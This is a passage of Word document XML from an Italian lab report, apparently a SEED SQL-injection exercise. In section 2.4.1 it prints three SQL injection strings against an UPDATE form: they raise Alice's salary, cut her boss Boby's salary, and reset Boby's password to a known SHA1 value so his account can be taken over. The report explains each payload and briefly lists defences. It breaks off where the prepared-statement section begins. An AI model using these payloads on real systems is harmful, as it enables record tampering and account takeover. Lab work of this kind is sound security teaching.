          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Validazione dell'input dell'utente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C9527" w14:textId="1AB3816C" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Utilizzo di prepared statement e stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792D734" w14:textId="1417201E" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Aggiornamento e manutenzione del software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756BE27" w14:textId="6A3BECD1" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Utilizzo di framework di sicurezza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5F081" w14:textId="1CE80A70" w:rsidR="00A17DA0" w:rsidRDefault="00E32C79" w:rsidP="00DC7036">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C79">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Limitare i privilegi di accesso al database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE6DFE" w14:textId="77777777" w:rsidR="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7A6B67" w14:textId="587208B9" w:rsidR="00E32C79" w:rsidRPr="00A17DA0" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc140165785"/>
      <w:r>
        <w:t>2.4.1 Attack on UPDATE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="188711A7" w14:textId="77777777" w:rsidR="00E32C79" w:rsidRPr="00E32C79" w:rsidRDefault="00E32C79" w:rsidP="00E32C79">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C88D813" w14:textId="73B19724" w:rsidR="00455765" w:rsidRDefault="00CC2CBF" w:rsidP="00455765">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455765">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1. Effettuate il login come Alice (pass: seedalice) e aumentate il vostro stipendio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449858BD" w14:textId="77777777" w:rsidR="00455765" w:rsidRDefault="00CC2CBF" w:rsidP="00455765">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455765">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>2. Punite il vostro capo Boby, riducendo il suo stipendio a 1 dollaro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E33243" w14:textId="78D5FEAE" w:rsidR="00102116" w:rsidRPr="00455765" w:rsidRDefault="00CC2CBF" w:rsidP="00455765">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455765">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>3. Cambiate la password di Boby con qualcosa che conoscete e poi accedete al suo account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207100B4" w14:textId="2ED30EBD" w:rsidR="00552650" w:rsidRDefault="00552650" w:rsidP="00102116">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DD9166" w14:textId="03F05380" w:rsidR="00E32C79" w:rsidRDefault="00E11961" w:rsidP="00102116">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analizzando </w:t>
      </w:r>
      <w:r w:rsidR="00010C7A">
        <w:t xml:space="preserve">la pagina unsafe_edit_frontend.php rileviamo che è possibile effettuare una sql injection sfruttando i form presenti </w:t>
      </w:r>
      <w:r w:rsidR="00BB6E17">
        <w:t>nella pagina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828530C" w14:textId="77777777" w:rsidR="00701541" w:rsidRDefault="00BB6E17" w:rsidP="00102116">
      <w:pPr>
        <w:pStyle w:val="Nessunaspaziatura"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizziamo quindi la stringa </w:t>
      </w:r>
      <w:r w:rsidR="00701541">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881CECB" w14:textId="4EED251F" w:rsidR="006A2AC7" w:rsidRDefault="00701541" w:rsidP="006A2AC7">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>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979458"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>‘,salary=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>999997</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">’; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56617F88" w14:textId="325E873F" w:rsidR="00FC0E31" w:rsidRDefault="005268F2" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="005268F2">
        <w:t xml:space="preserve">Attraverso la tecnica di SQL injection, è possibile chiudere la stringa del parametro "Nickname" con un primo apice, il che ci permette di iniettare del codice SQL all'interno della query. Successivamente, </w:t>
      </w:r>
      <w:r w:rsidR="00FC0E31">
        <w:t>impostiamo</w:t>
      </w:r>
      <w:r w:rsidRPr="005268F2">
        <w:t xml:space="preserve"> il valore del parametro "Salary" ad un numero elevato, utilizzando il carattere cancelletto "#" per commentare il resto della query di base e prevenire eventuali errori di sintassi. Tuttavia, affinché la query di SQL injection venga eseguita solo sul record di "Alice", è necessario includere l'opzione "WHERE" con la condizione "Name = Alice", altrimenti l'attacco si propagherebbe a tutti gli utenti del database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B57FF" w14:textId="5D70DCCC" w:rsidR="00626B9E" w:rsidRDefault="00626B9E" w:rsidP="00F42A10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD36DD4" wp14:editId="2FB93621">
            <wp:extent cx="6543081" cy="622570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="449699435" name="Immagine 2" descr="Immagine che contiene software, testo,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9435" name="Immagine 2" descr="Immagine che contiene software, testo, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId52"/>
                    <a:srcRect l="1951" t="74423" r="45720" b="16725"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6697695" cy="637281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA2035" w14:textId="3A9D2214" w:rsidR="00FC0E31" w:rsidRDefault="00FC0E31" w:rsidP="00F42A10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3931197B" wp14:editId="14BFECD3">
            <wp:extent cx="6589365" cy="2431915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="880290898" name="Immagine 1" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automa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0898" name="Immagine 1" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId53"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId54"/>
                    <a:srcRect l="12276" t="4813" r="3130" b="39682"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6599129" cy="2435519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C0212" w14:textId="77777777" w:rsidR="00005288" w:rsidRDefault="00005288" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CF38DF" w14:textId="5AD3ACEE" w:rsidR="004D0937" w:rsidRDefault="0039441D" w:rsidP="00F42A10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="059E1103" wp14:editId="62E5C86C">
            <wp:extent cx="6645910" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1224793730" name="Immagine 1224793730" descr="Immagine che contiene software, testo, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamen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3730" name="Immagine 1224793730" descr="Immagine che contiene software, testo, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId55"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3738245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873E705" w14:textId="73953370" w:rsidR="00EB7331" w:rsidRDefault="00EB7331" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE34B9F" w14:textId="77777777" w:rsidR="00EB7331" w:rsidRDefault="00EB7331">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6A2ED" w14:textId="453D90EC" w:rsidR="00EB7331" w:rsidRDefault="00EB7331" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Eseguiamo in maniera molto simile anche la modifica del</w:t>
      </w:r>
      <w:r w:rsidR="00342CB0">
        <w:t xml:space="preserve"> salario del capo Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07F574" w14:textId="4828715C" w:rsidR="00342CB0" w:rsidRDefault="00342CB0" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Utilizziamo la stringa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41AAD5" w14:textId="167633CD" w:rsidR="00342CB0" w:rsidRDefault="00342CB0" w:rsidP="00342CB0">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>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979458"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>‘,salary=</w:t>
      </w:r>
      <w:r w:rsidR="002C7CDA">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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name=’</w:t>
      </w:r>
      <w:r w:rsidR="002C7CDA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">’; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CBE6D7" w14:textId="6405D017" w:rsidR="00B23BDF" w:rsidRDefault="002C7CDA" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Nelle seguente immagine si può verificare la corretta esecuzion</w:t>
      </w:r>
      <w:r w:rsidR="003A2736">
        <w:t xml:space="preserve">e dell’attacco e nella parte inferiore la “get” </w:t>
      </w:r>
      <w:r w:rsidR="00B23BDF">
        <w:t>generata per la modifica del salario di Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7DEAA" w14:textId="55AAC87C" w:rsidR="00B23BDF" w:rsidRDefault="00B23BDF" w:rsidP="00F42A10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DA1F0E" wp14:editId="282FE478">
            <wp:extent cx="6653719" cy="3591627"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="309542162" name="Immagine 3" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticament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2162" name="Immagine 3" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId56"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId57"/>
                    <a:srcRect l="2746" t="16836" r="15136" b="4359"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6693556" cy="3613131"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F6800" w14:textId="77777777" w:rsidR="004C5FD3" w:rsidRDefault="004C5FD3" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622734C9" w14:textId="7EFFACF0" w:rsidR="00F92AE7" w:rsidRDefault="00F92AE7" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per l’ultima parte sfruttiamo la stessa </w:t>
      </w:r>
      <w:r w:rsidR="008B38FD">
        <w:t>vulnerabilità facendo attenzione a codificare in maniera corretta la password con crittografia SHA1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F146E" w14:textId="14481852" w:rsidR="008B38FD" w:rsidRDefault="008B38FD" w:rsidP="005268F2">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Utilizziamo quindi la seguente stringa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D04B6" w14:textId="53A81BDA" w:rsidR="008B38FD" w:rsidRDefault="008B38FD" w:rsidP="008B38FD">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>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979458"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>‘,password=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>SHA1(‘Capo’)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">’; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA8427" w14:textId="6584F8B4" w:rsidR="008B38FD" w:rsidRDefault="00251B7A" w:rsidP="00F42A10">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39460F0C" wp14:editId="6E6F580D">
            <wp:extent cx="3592748" cy="2543913"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1719009475" name="Immagine 4" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticament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9475" name="Immagine 4" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId58"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId59"/>
                    <a:srcRect l="15817" t="15794" r="52082" b="43794"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3619085" cy="2562561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F73D7" w14:textId="4584800C" w:rsidR="00F42A10" w:rsidRDefault="00F42A10" w:rsidP="00F42A10">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Siamo quindi riusciti a modificare dal profilo di Alice la password di Boby e quindi ad acquisire l’accesso al suo profilo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A735EC9" w14:textId="77777777" w:rsidR="00F42A10" w:rsidRDefault="00F42A10" w:rsidP="00F42A10">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0119B6F0" w14:textId="0737F189" w:rsidR="00144034" w:rsidRPr="00A17DA0" w:rsidRDefault="00144034" w:rsidP="00144034">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc140165786"/>
      <w:r>
        <w:t>2.4.2 Prepared Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="24E40BAE" w14:textId="507F3CC0" w:rsidR="005B17A4" w:rsidRDefault="00F421E4" w:rsidP="00F42A10">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:r w:rsidR="00B534CE">
